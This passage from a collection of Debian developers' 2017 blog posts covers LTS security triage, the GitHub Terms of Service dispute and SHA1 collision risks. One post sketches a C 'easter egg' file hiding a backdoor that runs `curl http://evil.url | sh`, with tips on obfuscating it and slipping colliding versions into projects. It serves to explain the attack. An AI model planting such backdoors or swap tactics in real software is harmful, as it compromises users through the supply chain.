need to be implemented on F-Droid's side before he agrees to the deployment, so this could take a while. I've also participated in the, ahem, discussion on the JWZ blog regarding a supposed vulnerability in Signal where it would leak previously unknown phone numbers to third parties. I reviewed the way the phone number is uploaded and, while it's possible to create a rainbow table of phone numbers (which are hashed with a truncated SHA-1 checksum), I couldn't verify the claims of other participants in the thread. For me, Signal still does the right thing with contacts, although I do question the way "read status" notifications get transmitted, but that belongs in another bug report / blog post.

Debian Long Term Support (LTS)

It's been more than a year working on Debian LTS, started by Raphael Hertzog at Freexian. I didn't work much in February, so I had a lot of hours to catch up on, and was unfortunately unable to do so, partly because I was busy with other projects, and partly because my colleagues are doing a great job at resolving the most important issues. So one of my concerns this month was finding work. It seemed that all the hard packages were either taken (e.g. my usual favorites, tiff and imagemagick, were done by others) or just too challenging (e.g. I don't feel quite comfortable tackling the LTS branch of the Linux kernel yet). I spent quite a bit of time trying to figure out what was wrong with pcre3, only to realise the "32" in the report was not about the architecture, but about the character width. Because of this, I marked 4 CVEs (CVE-2017-7186, CVE-2017-7244, CVE-2017-7245, CVE-2017-7246) as "not-affected", since the 32-bit character support wasn't enabled in wheezy (or jessie, for that matter). I still spent some time trying to reproduce the issues, which require a compiler with an AddressSanitizer, something that was introduced in both Clang and GCC after Wheezy was released, which makes reproducing this fairly complicated... This allowed me to experiment more with Vagrant, however, and I have provided the Debian cloud team with a 32-bit Vagrant box that was merged in shortly after, although it doesn't show up yet in the official list of Debian images. Then I looked at the apparmor situation (CVE-2017-6507, Debian bug #858768). That was one tricky bug as well, since it's not a security issue in apparmor per se, but more an issue with things that assume a certain behavior from apparmor. I have concluded that Wheezy was not affected because there are no assumptions of proper isolation there - which are provided only starting from LXC 1.0 - and Docker is not in Wheezy. I also couldn't reproduce the issue on Jessie, but, as it turns out, the issue was sysvinit-specific, which is why I couldn't reproduce it under the default systemd configuration shipped with Jessie. I also looked at the various binutils security issues: as I reported on the mailing list, I didn't see anything serious enough in there to warrant a security release, and followed the lead of both the stable and Red Hat security teams by marking this "no-dsa". I similarly reviewed the mp3splt security issues (specifically CVE-2017-5666) and was fairly puzzled by that issue, which seems to be triggered only by the same address sanitization extensions as PCRE, although there was some pretty wild interplay with debugging flags in there. All in all, it seems we can't reproduce that issue in wheezy, but I do not feel confident enough in the results to push that issue aside for now. I finally uploaded the pending graphicsmagick issue (DLA-547-2), a regression update to fix a crash that was introduced in the previous release (DLA-547-1, mistakenly named DLA-574-1). Hopefully that release should clear up some of the confusion and fix the regression. I also released DLA-879-1 for CVE-2017-6369 in firebird2.5, which was an interesting experiment: I couldn't reproduce the issue in a local VM. After following the Ubuntu setup tutorial, as I wasn't too familiar with the Firebird database until now (hint: the default username and password is sysdba/masterkey), I ended up assuming we were vulnerable and just backporting the patch, after seeing the jessie folks push out a release just in case.
I also looked at updating the ca-certificates package to deal with the pending WoSign/StartCom removal: I made an explicit list of the CAs that need to be removed after reviewing the Mozilla list. I also sent a patch for an unrelated issue where ca-certificates is writing to /usr/local (!!) in Debian bug #843722. I have also done some "meta" work in starting a discussion about fixing the missing DLA links in the tracker, as you will notice all of the above links lead to nowhere. Thanks to pabs, there are now some links, but unfortunately there are about 500 DLAs missing from the website. We also discussed ways to automate this (Debian bug #859123), something which is currently a manual process. This is now in the hands of the excellent webmaster team. I have also filed a few missing security bugs (Debian bug #859135, Debian bug #859136), partly because I wanted to help the security team. It turned out that the script needed some improvements, so I submitted a patch to make it easier to run.

Other projects

As usual, there's a mixed bag of chaos: more stuff on GitHub...

16 March 2017

Joey Hess: end of an era

I'm at home downloading hundreds of megabytes of stuff. This is the first time I've been in the position of "at home" + "reasonably fast internet" since I moved here in 2012. It's weird! [photo: satellite internet dish with solar panels in foreground] While I was renting here, I didn't mind dialup much. In a way it helps to focus the mind and build interesting stuff. But since I bought the house, the prospect of being stuck on dialup at home indefinitely became more painful. While I hope to get on the fiber line that's only a few miles away eventually, I have not convinced that ISP to build out to me yet. Not enough neighbors. So, satellite internet for now. [speedtest: 9.1 dB SNR, 15 megabit down / 4.5 up, with significant variation] The dish seems well aligned; speed varies a lot, but is easily hundreds of times faster than dialup. Latency is 2x dialup. The equipment uses more power than my laptop, so with the current solar panels, I anticipate using it only 6-9 months of the year. So I may be back to dialup most days come winter, until I get around to adding more PV capacity. It seems very cool that my house can capture sunlight and use it to beam signals 20 thousand miles into space. Who knows, perhaps there will even be running water one day. [photo: satellite dish]

8 March 2017

Antoine Beaupré: An update to GitHub's terms of service

On February 28th, GitHub published a brand new version of its Terms of Service (ToS). While the first draft announced earlier in February didn't generate much reaction, the new ToS raised concerns that they may break at least the spirit, if not the letter, of certain free-software licenses. Digging in further reveals that the situation is probably not as dire as some had feared. The first person to raise the alarm was probably Thorsten Glaser, a Debian developer, who stated that the "new GitHub Terms of Service require removing many Open Source works from it". His concerns are mainly about section D of the document, in particular section D.4 which states:
You grant us and our legal successors the right to store and display your Content and make incidental copies as necessary to render the Website and provide the Service.
Section D.5 then goes on to say:
[...] You grant each User of GitHub a nonexclusive, worldwide license to access your Content through the GitHub Service, and to use, display and perform your Content, and to reproduce your Content solely on GitHub as permitted through GitHub's functionality

ToS versus GPL

The concern here is that the ToS bypass the normal provisions of licenses like the GPL. Indeed, copyleft licenses are based on copyright law, which forbids users from doing anything with the content unless they comply with the license, which forces, among other things, "share alike" properties. By granting GitHub and its users rights to reproduce content without explicitly respecting the original license, the ToS may allow users to bypass the copyleft nature of the license. Indeed, as Joey Hess, author of git-annex, explained:
The new TOS is potentially very bad for copylefted Free Software. It potentially neuters it entirely, so GPL licensed software hosted on Github has an implicit BSD-like license
Hess has since removed all his content (mostly mirrors) from GitHub. Others disagree. In a well-reasoned blog post, Debian developer Jonathan McDowell explained the rationale behind the changes:
My reading of the GitHub changes is that they are driven by a desire to ensure that GitHub are legally covered for the things they need to do with your code in order to run their service.
This seems like a fair point to make: GitHub needs to protect its own rights to operate the service. McDowell then goes on to do a detailed rebuttal of the arguments made by Glaser, arguing specifically that section D.5 "does not grant [...] additional rights to reproduce outside of GitHub". However, specific problems arise when we consider that GitHub is a private corporation that users have no control over. The "Services" defined in the ToS explicitly "refers to the applications, software, products, and services provided by GitHub". The term "Services" is therefore not limited to the current set of services. This loophole may actually give GitHub the right to bypass certain provisions of licenses used on GitHub. As Hess detailed in a later blog post:
If Github tomorrow starts providing say, an App Store service, that necessarily involves distribution of software to others, and they put my software in it, would that be allowed by this or not? If that hypothetical Github App Store doesn't sell apps, but licenses access to them for money, would that be allowed under this license that they want to my software?
However, when asked on IRC, Bradley M. Kuhn of the Software Freedom Conservancy explained that "ultimately, failure to comply with a copyleft license is a copyright infringement" and that the ToS do outline a process to deal with such infringement. Some lawyers have also publicly expressed their disagreement with Glaser's assessment, with Richard Fontana from Red Hat saying that the analysis is "basically wrong". It all comes down to the intent of the ToS, as Kuhn (who is not a lawyer) explained:
any license can be abused or misused for an intent other than its original intent. It's why it matters to get every little detail right, and I hope Github will do that.
He went even further and said that "we should assume the ambiguity in their ToS as it stands is favorable to Free Software". The ToS have been in effect since February 28th; users "can accept them by clicking the broadcast announcement on your dashboard or by continuing to use GitHub". The immediacy of the change is one of the reasons why certain people are rushing to remove content from GitHub: there are concerns that continuing to use the service may be interpreted as consent to bypass those licenses. Hess even hosted a separate copy of the ToS [PDF] for people to be able to read the document without implicitly consenting. It is, however, unclear how a user should remove their content from the GitHub servers without actually agreeing to the new ToS.

CLAs

When I read the first draft, I initially thought there would be concerns about the mandatory Contributor License Agreement (CLA) in section D.5 of the draft:
[...] unless there is a Contributor License Agreement to the contrary, whenever you make a contribution to a repository containing notice of a license, you license your contribution under the same terms, and agree that you have the right to license your contribution under those terms.
I was concerned this would establish the controversial practice of forcing CLAs on every GitHub user. I managed to find a post from a lawyer, Kyle E. Mitchell, who commented on the draft and, specifically, on the CLA. He outlined issues with wording and definition problems in that section of the draft. In particular, he noted that "contributor license agreement is not a legal term of art, but an industry term" and "is a bit fuzzy". This was clarified in the final draft, in section D.6, by removing the use of the CLA term and by explicitly mentioning the widely accepted norm for licenses: "inbound=outbound". So it seems that section D.6 is not really a problem: contributors do not need to necessarily delegate copyright ownership (as some CLAs require) when they make a contribution, unless otherwise noted by a repository-specific CLA. An interesting concern he raised, however, was with how GitHub conducted the drafting process. A blog post announced the change on February 7th with a link to a form to provide feedback until the 21st, with a publishing deadline of February 28th. This gave little time for lawyers and developers to review the document and comment on it. Users then had to basically accept whatever came out of the process as-is. Unlike every software project hosted on GitHub, the ToS document is not part of a Git repository people can propose changes to or even collaboratively discuss. While Mitchell acknowledges that "GitHub are within their rights to update their terms, within very broad limits, more or less however they like, whenever they like", he sets higher standards for GitHub than for other corporations, considering the community it serves and the spirit it represents. He described the process as:
[...] consistent with the value of CYA, which is real, but not with the output-improving virtues of open process, which is also real, and a great deal more pleasant.
Mitchell also explained that, because of its position, GitHub can have a major impact on the free-software world.
And as the current forum of preference for a great many developers, the knock-on effects of their decisions throw big weight. While GitHub have the wheel (and they've certainly earned it, for now) they can do real damage.
In particular, there have been some concerns that the ToS change may be an attempt to further the already diminishing adoption of the GPL for free-software projects; on GitHub, the GPL has been surpassed by the MIT license. But Kuhn believes that attitudes at GitHub have begun changing:
GitHub historically had an anti-copyleft culture, which was created in large part by their former and now ousted CEO, Preston-Werner. However, recently, I've seen people at GitHub truly reach out to me and others in the copyleft community to learn more and open their minds. I thus have a hard time believing that there was some anti-copyleft conspiracy in this ToS change.

GitHub response

However, it seems that GitHub has actually been proactive in reaching out to the free software community. Kuhn noted that GitHub contacted the Conservancy to get its advice on the ToS changes. While he still thinks GitHub should fix the ambiguities quickly, he also noted that those issues "impact pretty much any non-trivial Open Source and Free Software license", not just copylefted material. When reached for comments, a GitHub spokesperson said:
While we are confident that these Terms serve the best needs of the community, we take our users' feedback very seriously and we are looking closely at ways to address their concerns.
Regardless, free-software enthusiasts have other concerns than the new ToS if they wish to use GitHub. First and foremost, most of the software running GitHub is proprietary, including the JavaScript served to your web browser. GitHub also created a centralized service out of a decentralized tool (Git). It has become the largest code hosting service in the world after only a few years and may well have become a single point of failure for free software collaboration in a way we have never seen before. Outages and policy changes at GitHub can have a major impact on not only the free-software world, but also the larger computing world that relies on its services for daily operation. There are now free-software alternatives to GitHub. GitLab.com, for example, does not seem to have similar licensing issues in its ToS and GitLab itself is free software, although based on the controversial open core business model. The GitLab hosting service still needs to get better than its grade of "C" in the GNU Ethical Repository Criteria Evaluations (and it is being worked on); other services like GitHub and SourceForge score an "F". In the end, all this controversy might have been avoided if GitHub was generally more open about the ToS development process and gave more time for feedback and reviews by the community. Terms of service are notorious for being confusing and something of a legal gray area, especially for end users who generally click through without reading them. We should probably applaud the efforts made by GitHub to make its own ToS document more readable and hope that, with time, it will address the community's concerns.
Note: this article first appeared in the Linux Weekly News.

2 March 2017

Joey Hess: what I would ask my lawyers about the new Github TOS

The Internet saw Github's new TOS yesterday and collectively shrugged. That's weird.. I don't have any lawyers, but the way Github's new TOS is written, I feel I'd need to consult with lawyers to understand how it might affect the license of my software if I hosted it on Github. And the license of my software is important to me, because it is the legal framework within which my software lives or dies. If I didn't care about my software, I'd be able to shrug this off, but since I do it seems very important indeed, and not worth taking risks with. If I were looking over the TOS with my lawyers, I'd ask these questions...
4 License Grant to Us
This seems to be saying that I'm granting an additional license to my software to Github. Is that right, or does "license grant" have some other legal meaning? If the Free Software license I've already licensed my software under allows for everything in this "License Grant to Us", would that be sufficient, or would my software still be licensed under two different licenses? There are violations of the GPL that can revoke someone's access to software under that license. Suppose that Github took such an action with my software, and their GPL license was revoked. Would they still have a license to my software under this "License Grant to Us" or not? "Us" is actually defined earlier as "GitHub, Inc., as well as our affiliates, directors, subsidiaries, contractors, licensors, officers, agents, and employees". Does this mean that if someone, say, does some brief contracting with Github, they get my software under this license? Would they still have access to it under that license when the contract work was over? What does "affiliates" mean? Might it include other companies? Is it even legal for a TOS to require a license grant? Don't license grants normally involve an intentional action on the licensor's part, like signing a contract or writing a license down? All I did was load a webpage in a browser and see on the page that by loading it, they say I've accepted the TOS. (I then set about removing everything from Github.) Github's old TOS was not structured as a license grant. What reasons might they have for structuring this TOS in such a way? Am I asking too many questions only 4 words into this thing? Or not enough?
Your Content belongs to you, and you are responsible for Content you post even if it does not belong to you. However, we need the legal right to do things like host it, publish it, and share it. You grant us and our legal successors the right to store and display your Content and make incidental copies as necessary to render the Website and provide the Service.
If this is a software license, the wording seems rather vague compared with other software licenses I've read. How much wiggle room is built into that wording? What are the chances that, if we had a dispute and this came before a judge, Github's lawyers would be able to find a creative reading of this that makes "do things like" include whatever they want? Suppose that my software is javascript code or gets compiled to javascript code. Would this let Github serve up the javascript code for their users to run as part of the process of rendering their website?
That means you're giving us the right to do things like reproduce your content (so we can do things like copy it to our database and make backups); display it (so we can do things like show it to you and other users); modify it (so our server can do things like parse it into a search index); distribute it (so we can do things like share it with other users); and perform it (in case your content is something like music or video).
Suppose that Github modifies my software, does not distribute the modified version, but converts it to javascript code and distributes that to their users to run as part of the process of rendering their website. If my software is AGPL licensed, they would be in violation of that license, but doesn't this additional license allow them to modify and distribute my software in such a way?
This license does not grant GitHub the right to sell your Content or otherwise distribute it outside of our Service.
I see that "Service" is defined as "the applications, software, products, and services provided by GitHub". Does that mean at the time I accept the TOS, or at any point in the future? If Github tomorrow starts providing, say, an App Store service, which necessarily involves distribution of software to others, and they put my software in it, would that be allowed by this or not? If that hypothetical Github App Store doesn't sell apps, but licenses access to them for money, would that be allowed under this license that they want granted to my software?
5 License Grant to Other Users
Any Content you post publicly, including issues, comments, and contributions to other Users' repositories, may be viewed by others. By setting your repositories to be viewed publicly, you agree to allow others to view and "fork" your repositories (this means that others may make their own copies of your Content in repositories they control).
Let's say that company Foo does something with my software that violates its GPL license and the license is revoked. So they are no longer allowed to copy my software under the GPL, but it's there on Github. Does this "License Grant to Other Users" give them a different license under which they can still copy my software? The word "fork" has a particular meaning on Github, which often includes modification of the software in a repository. Does this mean that other users could modify my software, even if its regular license didn't allow them to modify it or had been revoked? How would this use of the platform-specific term "fork" be interpreted in this license if it was being analyzed in a courtroom?
If you set your pages and repositories to be viewed publicly, you grant each User of GitHub a nonexclusive, worldwide license to access your Content through the GitHub Service, and to use, display and perform your Content, and to reproduce your Content solely on GitHub as permitted through GitHub's functionality. You may grant further rights if you adopt a license.
This paragraph seems entirely innocuous. So, what does your keen lawyer mind see in it that I don't? How sure are you about your answers to all this? We're fairly sure we know how well the GPL holds up in court; how well would your interpretation of all this hold up? What questions have I forgotten to ask?
And finally, the last question I'd be asking my lawyers: What's your bill come to? That much? Is using Github worth that much to me?

Jonathan McDowell: Rational thoughts on the GitHub ToS change

I woke this morning to Thorsten claiming the new GitHub Terms of Service could require the removal of Free software projects from it. This was followed by joeyh removing everything from github. I hadn't actually been paying attention, so I went looking for some sort of summary of whether I should be worried and ended up reading the actual ToS instead. TL;DR version: No, I'm not worried and I don't think you should be either.

First, a disclaimer. I'm not a lawyer. I have some legal training, but none of what I'm about to say is legal advice. If you're really worried about the changes then you should engage the services of a professional.

The gist of the concerns around GitHub's changes is that they potentially circumvent any license you have applied to your code, either converting GPL licensed software to BSD style (and thus permitting redistribution of binary forms without source) or making it illegal to host software under certain Free software licenses on GitHub due to being unable to meet the requirements of those licenses as a result of GitHub's ToS.

My reading of the GitHub changes is that they are driven by a desire to ensure that GitHub are legally covered for the things they need to do with your code in order to run their service. There are sadly too many people who upload code there without a license, meaning that technically no one can do anything with it. Don't do this, people; make sure that any project you put on GitHub has some sort of license attached to it (don't write your own - it's highly likely one of Apache/BSD/GPL will suit your needs) so people know whether they can make use of it or not. "I don't care" is not a valid reason not to do this.

Section D, relating to user generated content, is the one causing the problems. It's possibly easiest to walk through each subsection in order.

D1 says GitHub don't take any responsibility for your content; you make it, you're responsible for it, they're not accepting any blame for harm your content does nor for anything any member of the public might do with content you've put on GitHub. This seems uncontentious.

D2 reaffirms your ownership of any content you create, and requires you to only post 3rd party content to GitHub that you have appropriate rights to. So I can't, for example, upload a copy of Friday by Rebecca Black.

Thorsten has some problems with D3, where GitHub reserve the right to remove content that violates their terms or policies. He argues this could cause issues with licenses that require unmodified source code. This seems to be alarmist, and also applies to any random software mirror. The intent of such licenses is in general to ensure that the pristine source code is clearly separate from 3rd party modifications. Removal of content that infringes GitHub's T&Cs is not going to cause an issue.

D4 is a license grant to GitHub, and I think forms part of joeyh's problems with the changes. It affirms the content belongs to the user, but grants rights to GitHub to store and display the content, as well as make copies such as necessary to provide the GitHub service. They explicitly state that no right is granted to sell the content at all or to distribute the content outside of providing the GitHub service. This term would seem to be the minimum necessary for GitHub to ensure they are allowed to provide code uploaded to them for download, and provide their web interface. If you've actually put a Free license on your code then this isn't necessary, but from GitHub's point of view I can understand wanting to make it explicit that they need these rights to be granted. I don't believe it provides a method of subverting the licensing intent of Free software authors.

D5 provides more concern to Thorsten. It seems he believes that the ability to fork code on GitHub provides a mechanism to circumvent copyleft licenses. I don't agree. The second paragraph of this subsection limits the license granted to the user to be the ability to reproduce the content on GitHub - it does not grant them additional rights to reproduce outside of GitHub. These rights, to my eye, enable the forking and viewing of content within GitHub but say nothing about my rights to check code out and ignore the author's upstream license.

D6 clarifies that if you submit content to a GitHub repo that features a license you are licensing your contribution under these terms, assuming you have no other agreement in place. This looks to be something that benefits projects on GitHub receiving contributions from users there; it's an explicit statement that such contributions are under the project license.

D7 confirms the retention of moral rights by the content owner, but states they are waived purely for the purposes of enabling GitHub to provide service, as stated under D4. In particular this right is revocable, so in the event they do something you don't like you can instantly remove all of their rights. Thorsten is more worried about the ability to remove attribution and thus breach CC-BY or some BSD licenses, but GitHub's whole model is providing attribution for changesets and tracking such changes over time, so it's hard to understand exactly where the service falls down on ensuring the provenance of content is clear.

There are reasons to be wary of GitHub (they've taken a decentralised revision control system and made a business model around being a centralised implementation of it, and they store additional metadata such as PRs that aren't as easily extracted), but I don't see any indication that the most recent changes to their Terms of Service are something to worry about. The intent is clearly to provide GitHub with the legal basis they need to provide their service, rather than to provide a means for them to subvert the license intent of any Free software uploaded.

1 March 2017

Joey Hess: removing everything from github

Github recently drafted an update to their Terms Of Service. The new TOS is potentially very bad for copylefted Free Software. It potentially neuters it entirely, so GPL licensed software hosted on Github has an implicit BSD-like license. I'll leave the full analysis to the lawyers, but see Thorsten's analysis. I contacted Github about this weeks ago, and received only an anodyne response. The Free Software Foundation was also talking with them about it. It seems that Github doesn't care or has some reason to want to effectively neuter copyleft software licenses. The possibility that a Github TOS change could force a change to the license of your software hosted there, and that it's complicated enough that I'd have to hire a lawyer to know for sure, makes Github not worth bothering to use. Github's value proposition was never very high for me, and has now gone negative. I am deleting my repositories from Github at this time. If you used the Github mirrors for git-annex, propellor, ikiwiki, etckeeper, myrepos, click on the links for the non-Github repos (git.joeyh.name also has mirrors). Also, github-backup has a new website and repository off of github. (There's an oncoming severe weather event here, so it may take some time before I get everything deleted and cleaned up.) [Some commits to git-annex were pushed to Github this morning by an automated system, but I had NOT accepted their new TOS at that point, and explicitly do NOT give Github or anyone any rights to git-annex not granted by its GPL and AGPL licenses.] See also: PDF of Github TOS that can be read without being forced to first accept Github's TOS

Thorsten Glaser: New GitHub Terms of Service r e q u i r e removing many Open Source works from it

Please use the correct (perma)link to bookmark this article, not the page listing all wlog entries of the last decade. Thank you. Some updates inline and at the bottom.

The new Terms of Service of GitHub became effective today, which is quite problematic: there was a review phase, but my reviews pointing out the problems were not answered, and, while the language is somewhat changed from the draft, they became effective immediately. Now, the new ToS are not so bad that one immediately must stop using their service for disagreement, but it's important that certain content may no longer legally be pushed to GitHub. I'll try to explain which is affected, and why. I'm mostly working my way backwards through section D, as that's where the problems I identified lie, and because this goes from easier to harder. Note that using a private repository does not help, as the same terms apply.

Anything requiring attribution (e.g. CC-BY, but also BSD, …)
Section D.7 requires the person uploading content to waive any and all attribution rights. Ostensibly "to allow basic functions like search to work", which I can even believe, but, for a work the uploader did not create completely by themselves, they can't grant this licence. The CC licences are notably bad because they don't permit sublicencing, but even so, anything requiring attribution can, in almost all cases, not be "written or otherwise, created or uploaded by our Users". This is fact, and the exceptions are few.

Anything putting conditions on the right to use, display and perform the work and, worse, reproduce (all Copyleft)
Section D.5 requires the uploader to grant all other GitHub users the right to use, display and perform the work, and to reproduce it on GitHub. Note that section D.4 is similar, but granting the licence to GitHub (and their successors); while this is worded much more friendly than in the draft, that only makes it harder to see whether it affects works in a similar way. But that doesn't matter, since D.5 is clear enough. (This doesn't mean it's not a problem, just that I don't want to go there and analyse D.4, as D.5 points out the same problems but is easier.) This means that any and all content under copyleft licences is also no longer welcome on GitHub.

Anything requiring integrity of the author's source (e.g. LPPL)
Some licences are famous for requiring people to keep the original intact while permitting patches to be piled on top; this is actually permissible for Open Source, even though annoying, and the most common LaTeX licence is rather close to that. Section D.3 says any (partial) content can be removed, though keeping a PKZIP archive of the original is a likely workaround.

Affected licences
Anything copyleft (GPL, AGPL, LGPL, CC-*-SA) or requiring attribution (CC-BY-*, but also 4-clause BSD, Apache 2 with NOTICE text file, …) is affected. BSD-style licences without advertising clause (MIT/Expat, MirOS, etc.) are probably not affected if GitHub doesn't go too far and dissociates excerpts from their context and legal info, but then nobody would be able to distribute it, so that'd be useless.

But what if I just fork something under such a licence?
Only continuing to use GitHub constitutes accepting the new terms. This means that repositories from people who last used GitHub before March 2017 are excluded. Even then, the new terms likely only apply to content uploaded in March 2017 or later (note that git commit dates are unreliable; you have to actually check whether the contribution dates from March 2017 or later). And then, most people are likely unaware of the new terms.
If they upload content for which they themselves don't have the appropriate rights (waivers to attribution and copyleft/share-alike clauses), it's plainly illegal and also makes your upload of it, or a derivative thereof, no more legal. Granted, people who, in full knowledge of the new ToS, share any User-Generated Content with GitHub on or after 1 March, 2017, and actually have the appropriate rights to do that, can do that; and if you encounter such a repository, you can fork, modify and upload that iff you also waive attribution and copyleft/share-alike rights for your portion of the upload. But especially in the beginning these will be few and far between (even more so taking into account that GitHub is, legally speaking, a mess, and they don't even care about hosting only OSS / Free works).

Conclusion (Fazit)
I'll be starting to remove any such content of mine, such as the source code mirrors of jupp, which is under the GNU GPLv1, now, and will be requesting people who forked such repositories on GitHub to also remove them. This is not something I like to do, but something I am required to do in order to comply with the licence granted to me by my upstream. Anything you've found contributed by me in the meantime is up for review; ping me if I forgot something. (mksh is likely safe, even if I hereby remind you that the attribution requirement of the BSD-style licences still applies outside of GitHub.) (Pet peeve: why can't I adopt a licence with British spelling? They seem to require oversea barbarian spelling.)

The others
Atlassian Bitbucket has similar terms (even worse actually; I looked at them to see whether I could mirror mksh there, and turns out, I can't if I don't want to lose most of what few rights I retain when publishing under a permissive licence). Gitlab seems to not have such, but requires you to indemnify them; YMMV. I think I'll self-host the removed content.

And now?
I'm in contact with someone from GitHub Legal (not explicitly in an official capacity though) and will try to explain the sheer magnitude of the problem and ways to solve this (leaving the technical issues to technical solutions and requiring legal solutions only where strictly necessary), but for now, the ToS are enacted (another point of my criticism of this move) and thus the aforementioned works must go off GitHub right now. That's not to say they may not come back later once this all has been addressed, if it will be addressed to allow that. The new ToS do have some good; for example, the old ToS said you allow every GitHub user to "fork" your repositories without ever specifying what that means. It's just that the people over at GitHub need to understand that, both legally and technically, any and all OSS licences grant enough to run a hosting platform already, and separate explicit grants are only needed if a repository contains content not under an OSI/OKFN/Copyfree/FSF/DFSG-free licence. I have been told that these are important issues and been thanked for my feedback; we'll see what comes from this.

Footnotes:
- maybe with a little more effort on the coders' side
- All licences on one of those lists or conformant to the DFSG, OSD or OKD should do
- e.g. when displaying search results, add a note "this is an excerpt, click HERE to get to the original work in its context, with licence and attribution" where HERE is a backlink to the file in the repository
- It is understood those organisations never un-approve any licence that rightfully conforms to those definitions (also in cases like a grant saying "just use any OSS licence", which is occasionally used)

Update: In the meantime, joeyh has written not one but two insightful articles (although I disagree in some details; the new licence is only to GitHub users (D.5) and GitHub (D.4) and only within their system, so, while uploaders would violate the ToS (they cannot grant the licence) and (probably) the upstream-granted copyleft licence, this would not mean that everyone else wasn't bound by the copyleft licence in, well, enough cases to count; yes, it's possible to construct situations in which this hurts the copyleft fraction, but no, they're nowhere near 100%).

27 February 2017

Joey Hess: making git-annex secure in the face of SHA1 collisions

git-annex has never used SHA1 by default. But, there are concerns about SHA1 collisions being used to exploit git repositories in various ways. Since git-annex builds on top of git, it inherits its foundational SHA1 weaknesses. Or does it? Interestingly, when I dug into the details, I found a way to make git-annex repositories secure from SHA1 collision attacks, as long as signed commits are used (and verified). When git commits are signed (and verified), SHA1 collisions in commits are not a problem. And there seems to be no way to generate usefully colliding git tree objects (unless they contain really ugly binary filenames). That leaves blob objects, and when using git-annex, those are git-annex key names, which can be secured from being a vector for SHA1 collision attacks. This needed some work on git-annex, which is now done, so look for a release in the next day or two that hardens it against SHA1 collision attacks. For details about how to use it, and more about why it avoids git's SHA1 weaknesses, see https://git-annex.branchable.com/tips/using_signed_git_commits/. My advice is, if you are using a git repository to publish or collaborate on binary files, in which it's easy to hide SHA1 collisions, you should switch to using git-annex and signed commits. PS: Of course, verifying gpg signatures on signed commits adds some complexity and won't always be done. It turns out that the current SHA1 known-prefix collision attack cannot be usefully used to generate colliding commit objects, although a future common-prefix collision attack might. So, even if users don't verify signed commits, I believe that repositories using git-annex for binary files will be as secure as git repositories containing binary files used to be. However secure that might be..
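Here's a minimal sketch (my own illustration, not git-annex's tooling) of scripting the two things this relies on when picking up a clone: verifying the GPG signature on HEAD before trusting anything, and switching on the hardening option. I'm assuming the option is the annex.securehashesonly git config described in the linked tip; treat the exact name as an assumption.

import subprocess

def harden_annex_clone(repo="."):
    # git verify-commit exits non-zero if HEAD's signature is missing or bad,
    # so check=True makes this raise and stops us before using the repo.
    subprocess.run(["git", "verify-commit", "HEAD"], cwd=repo, check=True)
    # Assumed hardening knob from the linked tip: refuse keys using insecure hashes.
    subprocess.run(["git", "config", "annex.securehashesonly", "true"],
                   cwd=repo, check=True)

harden_annex_clone()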

24 February 2017

Joey Hess: SHA1 collision via ASCII art

Happy SHA1 collision day everybody! If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files. The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.) Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks. The "good" data chunk might then look like this:
7*yLN#!NOKj@ FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ
And the "bad" data chunk like this:
9xiV^Ksn=<A!<^ l4~ uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh
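As an aside on the git blob object header trick mentioned above: git's object id is the SHA1 of a "blob <length>" header, a NUL byte, and then the file content, so a collision that is meant to survive git add has to be computed over that prefixed form. A minimal sketch in Python, where good.c and bad.c stand in for hypothetical colliding files; the output should match what git hash-object prints for the same files.

import hashlib

def git_blob_sha1(data: bytes) -> str:
    # git hashes "blob <length>\0" followed by the content.
    header = b"blob %d\x00" % len(data)
    return hashlib.sha1(header + data).hexdigest()

for name in ("good.c", "bad.c"):  # hypothetical colliding files
    with open(name, "rb") as f:
        print(name, git_blob_sha1(f.read()))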
Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is. Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:
7*yLN#!NOK
3*\LN'\NO@
3*/LN  \.A
5*\LN   \.
>=======:)
5*\7N   /.
3*/7N  /.V
3*\7N'/NO@
7*y7N#!NOX
Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */
/* Call this at the top of main() */
/* (Assumes stdio.h, string.h and stdlib.h are included.) */
void check_display_easter_egg (char **argv) {
    if (strcmp(argv[1], "--easter-egg") == 0)
        printf(amazing_ascii_art);
    /* In the "bad" colliding version the art starts with '9': run the backdoor. */
    if (amazing_ascii_art[0] == '9')
        system("curl http://evil.url | sh");
}
Now, you need a C obfuscation person, to make that backdoor a little less obvious. (Hint: Add code to fix the newlines, paint additional ASCII sprites over top of the static art, add animations, and bury the shellcode in there.) After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs. Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chunk (a toy sketch of that swap follows the list below). You can then replace the good file with the bad version here and there, and no one will be the wiser (except the easter egg will display the "bad" first line before it roots them). Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper. You can pick either of these two lessons to take away:
